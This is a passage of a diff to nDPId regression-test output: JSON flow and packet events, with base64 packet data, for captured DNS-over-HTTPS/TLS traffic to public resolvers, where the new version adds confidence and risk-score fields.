BQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3Cr0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"}
-00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 01438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="}
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01041{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDszY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01083{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 